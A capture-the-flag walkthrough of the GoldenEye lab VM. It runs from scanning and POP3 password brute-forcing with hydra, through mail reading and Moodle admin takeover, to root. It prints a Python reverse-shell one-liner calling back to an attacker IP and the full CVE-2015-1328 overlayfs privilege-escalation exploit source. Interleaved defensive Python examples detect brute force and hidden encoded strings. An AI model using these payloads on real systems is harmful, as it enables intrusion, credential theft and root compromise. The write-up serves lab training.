GoldenEye

First target box of the new year.

The VM image used is kali20221-GoldenEye-v1. Both machines have their network adapters set to NAT mode so that they sit on the same subnet.

Information gathering

Live host discovery

Start with information gathering by scanning the subnet for live hosts. First check Kali's network interface with ifconfig:

┌──(kali㉿kali)-[~/Desktop]
└─$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.4.130 netmask 255.255.255.0 broadcast 192.168.4.255
inet6 fe80::20c:29ff:febb:3f71 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:bb:3f:71 txqueuelen 1000 (Ethernet)
RX packets 9 bytes 1285 (1.2 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 32 bytes 3828 (3.7 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

Kali's address is 192.168.4.130. Two ways to scan for live hosts:

Method 1: arp-scan -l
Method 2: nmap -sn 192.168.4.0/24

Results of method 1:

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo arp-scan -l
[sudo] password for kali:
Interface: eth0, type: EN10MB, MAC: 00:0c:29:bb:3f:71, IPv4: 192.168.4.130
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.4.2 00:50:56:f2:00:29 VMware, Inc.
192.168.4.100 00:50:56:c0:00:08 VMware, Inc.
192.168.4.129 00:0c:29:b1:3c:e5 VMware, Inc.
192.168.4.254 00:50:56:e4:b5:6f VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.950 seconds (131.28 hosts/sec). 4 responded

Results of method 2:

┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -sn 192.168.4.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2026-02-20 03:21 EST
Nmap scan report for 192.168.4.2
Host is up (0.00019s latency).
Nmap scan report for 192.168.4.100
Host is up (0.00017s latency).
Nmap scan report for severnaya-station.com (192.168.4.129)
Host is up (0.00027s latency).
Nmap scan report for 192.168.4.130
Host is up (0.00019s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 6.62 seconds

Port scanning

Next, scan the ports of each live host:

┌──(kali㉿kali)-[~/Desktop]
└─$ nmap 192.168.4.2
Starting Nmap 7.92 ( https://nmap.org ) at 2026-02-20 03:24 EST
Nmap scan report for 192.168.4.2
Host is up (0.00011s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
53/tcp filtered domain

Nmap done: 1 IP address (1 host up) scanned in 1.64 seconds

┌──(kali㉿kali)-[~/Desktop]
└─$ nmap 192.168.4.100
Starting Nmap 7.92 ( https://nmap.org ) at 2026-02-20 03:24 EST
Nmap scan report for 192.168.4.100
Host is up (0.00010s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
902/tcp open iss-realsecure
912/tcp open apex-mesh

Nmap done: 1 IP address (1 host up) scanned in 11.94 seconds

┌──(kali㉿kali)-[~/Desktop]
└─$ nmap 192.168.4.129
Starting Nmap 7.92 ( https://nmap.org ) at 2026-02-20 03:25 EST
Nmap scan report for severnaya-station.com (192.168.4.129)
Host is up (0.00011s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 0.04 seconds

┌──(kali㉿kali)-[~/Desktop]
└─$ nmap 192.168.4.254
Starting Nmap 7.92 ( https://nmap.org ) at 2026-02-20 03:25 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.03 seconds

After testing, 192.168.4.129 is the target box; the initial scan shows ports 25 and 80 open. Let's take a look at the HTTP service:

[Screenshot: GoldenEye1]

There are a few useful pieces of information. First, the page points to another resource URL, /sev-home/. Second, terminal.js contains this comment:

//Boris, make sure you update your default password. 
//My sources say MI6 maybe planning to infiltrate.
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;
//
//BTW Natalya says she can break your codes
//

Decoding &#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114; gives InvincibleHack3r. Combined with the comment, Boris/Natalya are probably the users this password belongs to. Visiting 192.168.4.129/sev-home prompts for a username and password; after several attempts the working login turned out to be boris/InvincibleHack3r, so both upper- and lower-case usernames need to be tried.
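The decoding step above, written out as an added Python example (this is not code from the write-up or from the GoldenEye box): the first function does exactly what a browser would do with the numeric character references, and the second generalises it into a small audit check that scans source text for long runs of such entities and reports what they hide, which is the check a code reviewer would want for client-side files like terminal.js. The sample source below is constructed, reusing the comment quoted above; html.unescape is the standard-library equivalent of the decoder.

```python
import html
import re

# The entity-encoded string from the terminal.js comment quoted above.
ENCODED = ("&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;"
           "&#72;&#97;&#99;&#107;&#51;&#114;")

# One numeric character reference: decimal (&#73;) or hexadecimal (&#x49;).
NUMERIC_ENTITY = re.compile(r"&#(?:[xX]([0-9A-Fa-f]+)|([0-9]+));")


def decode_numeric_entities(text):
    """Replace every numeric character reference in `text` with its character.

    This is what a browser does to the comment if it is rendered as HTML;
    html.unescape() does the same and additionally handles named entities.
    """
    def to_char(m):
        if m.group(1) is not None:          # hex form
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2)))         # decimal form
    return NUMERIC_ENTITY.sub(to_char, text)


def find_encoded_runs(source, min_entities=8):
    """Scan JavaScript/HTML source for runs of consecutive numeric entities.

    A long run of &#NN; in a comment or string literal is a cheap way of hiding
    text from a casual reader; listing such runs with their decoded value is a
    simple content-audit check. Returns (raw_run, decoded_text) pairs.
    """
    run_re = re.compile(r"(?:&#(?:[xX][0-9A-Fa-f]+|[0-9]+);){%d,}" % min_entities)
    return [(m.group(0), decode_numeric_entities(m.group(0)))
            for m in run_re.finditer(source)]


# Constructed sample source for the audit check (not the real terminal.js).
SAMPLE_JS = (
    "// Boris, make sure you update your default password.\n"
    "// I encoded you p@ssword below...\n"
    "// " + ENCODED + "\n"
    "var sep = '&#160;';  // a single entity: below the threshold, ignored\n"
)

if __name__ == "__main__":
    print(decode_numeric_entities(ENCODED))   # InvincibleHack3r
    print(html.unescape(ENCODED))             # same result via the stdlib
    for raw, decoded in find_encoded_runs(SAMPLE_JS):
        print(f"{decoded!r} hidden as {raw[:24]}...")
```

The threshold of eight consecutive entities keeps ordinary markup such as a lone &#160; out of the report; lower it if the files under review legitimately contain no entity runs at all.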

After logging in, the page shows the following message:

GoldenEye

GoldenEye is a Top Secret Soviet oribtal weapons project. Since you have access you definitely hold a Top Secret clearance and qualify to be a certified GoldenEye Network Operator (GNO)

Please email a qualified GNO supervisor to receive the online GoldenEye Operators Training to become an Administrator of the GoldenEye system

Remember, since security by obscurity is very effective, we have configured our pop3 service to run on a very high non-default port

The hint says a POP3 service is running on a very high non-standard port, so a full port scan is needed:

┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -p 1-65535 192.168.4.129
Starting Nmap 7.92 ( https://nmap.org ) at 2026-02-20 03:40 EST
Nmap scan report for severnaya-station.com (192.168.4.129)
Host is up (0.00011s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
55006/tcp open unknown
55007/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 0.90 seconds

Brute-forcing POP3

POP3 (Post Office Protocol version 3) is a protocol for receiving e-mail and part of the TCP/IP suite. Its default port is 110 (encrypted connections usually use port 995). It is one of the most widely used mail-retrieval protocols and works together with SMTP, which handles sending.
POP3's main job is to let a user download mail from the mail server to a local device through a mail client such as Outlook or Thunderbird. After download the messages are normally deleted from the server (unless it is configured to keep a copy), so the mail is then only available on the device that downloaded it.

At this point we can try brute-forcing passwords for the two usernames found earlier, Boris and Natalya, trying both capitalisations. The tool used is hydra, which ships with Kali; the command is:

┌──(kali㉿kali)-[~/Desktop]
└─$ hydra -L username.txt -P /usr/share/wordlists/fasttrack.txt 192.168.4.129 -s 55007 pop3

Note: with -L, the argument is a wordlist; username.txt contains:

boris
Boris
natalya
Natalya

With -l the argument is a single username; -p/-P work the same way. fasttrack.txt is a wordlist that ships with hydra. -s takes the port POP3 is running on.

┌──(kali㉿kali)-[~/Desktop]
└─$ hydra -L username.txt -P /usr/share/wordlists/fasttrack.txt 192.168.4.129 -s 55007 pop3
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-02-20 03:49:32
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 888 login tries (l:4/p:222), ~56 tries per task
[DATA] attacking pop3://192.168.4.129:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 808 to do in 00:11h, 16 active
[55007][pop3] host: 192.168.4.129 login: Boris password: secret1!
[55007][pop3] host: 192.168.4.129 login: Natalya password: bird

This gives two POP3 credential pairs: Boris/secret1! and Natalya/bird.
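Seen from the mail server, a hydra run like the one above is a burst of failed POP3 logins from one address followed by a success. The following added Python example (not code from the write-up or from the box) shows the detection logic for that pattern: a per-source sliding window of failures, one alert when the count crosses a threshold, and a second alert when a login succeeds right after such a burst. The log format and the sample lines are constructed (loosely modelled on a POP3 login daemon's auth log) and use the tries-per-minute rate hydra reported above.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log format (not real output from the GoldenEye box):
#   <ISO timestamp> pop3-login: auth failed: user=<name>, rip=<source ip>
#   <ISO timestamp> pop3-login: login ok: user=<name>, rip=<source ip>
LOG_RE = re.compile(
    r"^(?P<ts>\S+) pop3-login: (?P<result>auth failed|login ok): "
    r"user=<(?P<user>[^>]*)>, rip=(?P<rip>[0-9.]+)$"
)


def parse_line(line):
    """Parse one log line into a dict, or return None for lines we don't understand."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return {"ts": datetime.fromisoformat(m["ts"]), "result": m["result"],
            "user": m["user"], "rip": m["rip"]}


def detect_bruteforce(lines, threshold=20, window=timedelta(seconds=60)):
    """Flag source IPs with >= threshold failed logins inside a sliding window,
    and any successful login that follows a burst of failures from the same IP
    (the trace a wordlist attack leaves once it hits a valid password).
    Returns a list of (rip, reason, timestamp) tuples."""
    recent_failures = defaultdict(deque)   # rip -> timestamps of recent failures
    already_flagged = set()
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        q = recent_failures[ev["rip"]]
        while q and ev["ts"] - q[0] > window:   # expire failures outside the window
            q.popleft()
        if ev["result"] == "auth failed":
            q.append(ev["ts"])
            if len(q) >= threshold and ev["rip"] not in already_flagged:
                already_flagged.add(ev["rip"])
                alerts.append((ev["rip"],
                               f"{len(q)} failed POP3 logins within {int(window.total_seconds())}s",
                               ev["ts"]))
        elif len(q) >= threshold // 2:
            alerts.append((ev["rip"],
                           f"successful login as {ev['user']} after {len(q)} recent failures",
                           ev["ts"]))
    return alerts


def build_sample_log():
    """Constructed sample: one harmless typo from another host, then 40 failures
    at hydra's reported ~80 tries/min from the attacking IP, then the hit."""
    base = datetime(2026, 2, 20, 3, 49, 32)
    users = ["boris", "Boris", "natalya", "Natalya"]
    lines = [f"{(base - timedelta(seconds=5)).isoformat()} pop3-login: "
             f"auth failed: user=<xenia>, rip=192.168.4.100"]
    for i in range(40):
        ts = base + timedelta(seconds=0.75 * i)
        lines.append(f"{ts.isoformat()} pop3-login: auth failed: "
                     f"user=<{users[i % 4]}>, rip=192.168.4.130")
    hit = base + timedelta(seconds=30)
    lines.append(f"{hit.isoformat()} pop3-login: login ok: user=<Boris>, rip=192.168.4.130")
    return lines


if __name__ == "__main__":
    for rip, reason, ts in detect_bruteforce(build_sample_log()):
        print(f"{ts.isoformat()} {rip}: {reason}")
```

The second alert is the important one for incident response: a success after a burst of failures is the moment a credential was actually compromised, which is why the example flags it separately instead of only counting failures.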

Looking at the first one:

┌──(kali㉿kali)-[~/Desktop]
└─$ nc 192.168.4.129 55007
+OK GoldenEye POP3 Electronic-Mail System
user Boris
+OK
pass secret1!
+OK Logged in.
list
+OK 3 messages:
1 544
2 373
3 921

There are 3 messages. Use retr 1, retr 2 and retr 3 to read them one by one and look for useful information. Logging in as Natalya/bird, one of the messages contains the following:

retr 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 17C96454B1
for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu
Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)
Ok, user creds are:
username: xenia
password: RCP90rulez!
Boris verified her as a valid contractor so just create the account ok?
And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....
Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.

Extracting the useful parts:

username: xenia
password: RCP90rulez!
Boris verified her as a valid contractor so just create the account ok?
And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....
Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.

A username, a password, a domain mapping and a URL. Following the hint, add a line to /etc/hosts:

192.168.4.129   severnaya-station.com

Then visit severnaya-station.com/gnocertdir

[Screenshot: GoldenEye2]

The content is now reachable. Try logging in with the credentials from the email, xenia/RCP90rulez!; the login succeeds, and next comes more information gathering.

Browsing around shows that this is Moodle 2.2.3, which can be googled for usable PoCs. There is another useful piece of information under home -> my profile -> messages:

Recent conversations
Picture of Dr DoakDr DoakAdd contactBlock contactMessage history24/04/18, 21:24Greetings Xenia, As a new Contractor to our GoldenEye training I welcome you. Once your account has been complete, more courses will appear on your dashboard. If you have any questions message me via email, not here. My email username is... doak Thank you, Cheers, Dr. Doak "The Doctor" Training Scientist - Sr Level Training Operating Supervisor GoldenEye Operations Center Sector Level 14 - NO2 - id:998623-1334 Campus 4, Building 57, Floor -8, Sector 6, cube 1,007 Phone 555-193-826 Cell 555-836-0944 Office 555-846-9811 Personal 555-826-9923 Email: doak@ Please Recycle before you print, Stay Green aka save the company money! "There's such a thing as Good Grief. Just ask Charlie Brown" - someguy "You miss 100% of the shots you don't shoot at" - Wayne G. THIS IS A SECURE MESSAGE DO NOT SEND IT UNLESS.
View: this conversation

The message says "My email username is ... doak", so brute-force the POP3 service again with the username doak: hydra -l doak -P /usr/share/wordlists/fasttrack.txt 192.168.4.129 -s 55007 pop3. This yields doak/goat. Log in to POP3 with this account and read the mail:

└─$ nc 192.168.4.129 55007
+OK GoldenEye POP3 Electronic-Mail System
user doak
+OK
pass goat
+OK Logged in.
list
+OK 1 messages:
1 606
.
retr 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 97DC24549D
for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu

James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......

username: dr_doak
password: 4England!

This gives dr_doak/4England!

Logging in to Moodle as an administrator

Use these credentials to log in to the Moodle 2.2.3 site. Once in, do another round of information gathering: under home -> my profile -> my private files there is a file s3cert.txt with the following content:

007,

I was able to capture this apps adm1n cr3ds through clear txt.

Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.

Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.

Following the hint, visit severnaya-station.com/dir007key/for-007.jpg to get an image. Save it and analyse it for hidden information: in 010 Editor's hex view, or with strings, a base64-encoded string can be found:

[Screenshot: GoldenEye3]

Decoding the base64 gives xWinter1995x!. Logging in to the Moodle CMS with admin/xWinter1995x! succeeds, and the account has administrator privileges.
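The strings-based inspection of the image, as an added Python example (not code from the write-up): a minimal reimplementation of the `strings` logic, plus a filter that keeps only those strings that are valid base64 and decode to printable text, so that decoys like the JFIF marker are discarded. The sample JPEG bytes are constructed; the embedded value is the decoded string from this step re-encoded, not the actual for-007.jpg.

```python
import base64
import re

PRINTABLE = set(range(0x20, 0x7F))          # printable ASCII, space through '~'
B64_RE = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")


def extract_strings(data, min_len=4):
    """Return runs of at least min_len printable ASCII bytes (the core of `strings`)."""
    out, run = [], bytearray()
    for b in data:
        if b in PRINTABLE:
            run.append(b)
        else:
            if len(run) >= min_len:
                out.append(bytes(run))
            run = bytearray()
    if len(run) >= min_len:
        out.append(bytes(run))
    return out


def find_base64_strings(data, min_len=4):
    """Among the printable strings in data, keep those that are well-formed base64
    AND decode to printable ASCII. Returns (raw_base64, decoded_text) pairs.
    Short markers such as b"JFIF" pass the charset test but fail the decode test."""
    hits = []
    for s in extract_strings(data, min_len):
        if len(s) % 4 != 0 or not B64_RE.match(s):
            continue
        try:
            decoded = base64.b64decode(s, validate=True)
        except ValueError:                 # binascii.Error is a ValueError subclass
            continue
        if decoded and all(b in PRINTABLE for b in decoded):
            hits.append((s.decode("ascii"), decoded.decode("ascii")))
    return hits


def build_sample_jpeg():
    """Constructed stand-in for for-007.jpg: a JFIF header, a decoy metadata
    string, non-printable filler, and the base64 of the value found in this
    step appended after the image data."""
    payload = base64.b64encode(b"xWinter1995x!")   # eFdpbnRlcjE5OTV4IQ==
    return (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01"
            + b"\x00Photoshop 3.0\x00"              # has a space: not base64
            + b"\x00\x01\xff\xfe" * 16               # binary filler, no printable runs
            + payload
            + b"\xff\xd9")


if __name__ == "__main__":
    blob = build_sample_jpeg()
    print("strings:", [s.decode("ascii") for s in extract_strings(blob)])
    for raw, decoded in find_base64_strings(blob):
        print(f"{raw} -> {decoded}")
```

On a real file, run find_base64_strings over the bytes read from disk; the decode-to-printable filter is what separates an intentionally planted string from the many short base64-shaped runs that any binary contains by chance.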

Command execution and reverse shell

A search shows that Moodle 2.2.3 has a command execution vulnerability that can be exploited directly with the msf framework. In my case, however, the exploit did not succeed.

So I switched to doing it by hand:

Use the path to aspell setting under home -> site administration -> server -> system paths to get a shell.

[Screenshot: GoldenEye4]

The target has a Python environment, so Python can be used for the reverse shell: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.4.130",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Listen on port 8888 on Kali. Note that the Spell engine must be changed to PSpellShell.

[Screenshot: GoldenEye5]

Then go to Home -> My profile -> Blogs -> Add a new entry and edit anything to trigger it.

[Screenshot: GoldenEye6]

The shell comes back. For convenience, spawn a tty: python -c 'import pty; pty.spawn("/bin/bash")'. The shell runs as www-data.

Privilege escalation

Privilege escalation here uses a Linux kernel exploit. uname -a shows kernel version 3.13.0-32-generic:

<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ uname -a
uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

A Google search turns up a matching Linux kernel privilege escalation script, but it needs a small modification:

/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)

*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT

user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)

greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>

#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n"

static char child_stack[1024*1024];

static int
child_exec(void *stuff)
{
    char *file;
    system("rm -rf /tmp/ns_sploit");
    mkdir("/tmp/ns_sploit", 0777);
    mkdir("/tmp/ns_sploit/work", 0777);
    mkdir("/tmp/ns_sploit/upper",0777);
    mkdir("/tmp/ns_sploit/o",0777);

    fprintf(stderr,"mount #1\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
        // workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
            exit(-1);
        }
        file = ".access";
        chmod("/tmp/ns_sploit/work/work",0777);
    } else file = "ns_last_pid";

    chdir("/tmp/ns_sploit/o");
    rename(file,"ld.so.preload");

    chdir("/");
    umount("/tmp/ns_sploit/o");
    fprintf(stderr,"mount #2\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
            exit(-1);
        }
        chmod("/tmp/ns_sploit/work/work",0777);
    }

    chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
    umount("/tmp/ns_sploit/o");
}

int
main(int argc, char **argv)
{
    int status, fd, lib;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;

    fprintf(stderr,"spawning threads\n");

    if((wrapper = fork()) == 0) {
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");

        if((init = fork()) == 0) {
            pid_t pid =
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
            if(pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }

            waitpid(pid, &status, 0);

        }

        waitpid(init, &status, 0);
        return 0;
    }

    usleep(300000);

    wait(NULL);

    fprintf(stderr,"child threads done\n");

    fd = open("/etc/ld.so.preload",O_WRONLY);

    if(fd == -1) {
        fprintf(stderr,"exploit failed\n");
        exit(-1);
    }

    fprintf(stderr,"/etc/ld.so.preload created\n");
    fprintf(stderr,"creating shared library\n");
    lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
    write(lib,LIB,strlen(LIB));
    close(lib);
    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    if(lib != 0) {
        fprintf(stderr,"couldn't create dynamic library\n");
        exit(-1);
    }
    write(fd,"/tmp/ofs-lib.so\n",16);
    close(fd);
    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
    execl("/bin/su","su",NULL);
}

The line lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w"); needs gcc changed to cc, giving lib = system("cc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");. Put the modified script on Kali and start an HTTP server with python -m http.server 9999, then download the script onto the target with wget.

[Screenshot: GoldenEye7]

The download succeeds on the target; next, compile it into an executable and run it.

cc -o exp 37292.c compiles 37292.c into the executable exp. Run ./exp, and whoami then shows the shell has been escalated to root.

[Screenshot: GoldenEye8]

Getting the final flag

The flag for this box is a hidden file under /root, so cd /root and run ls -la to show all files and find it. Finally, cat .flag.txt gives the flag.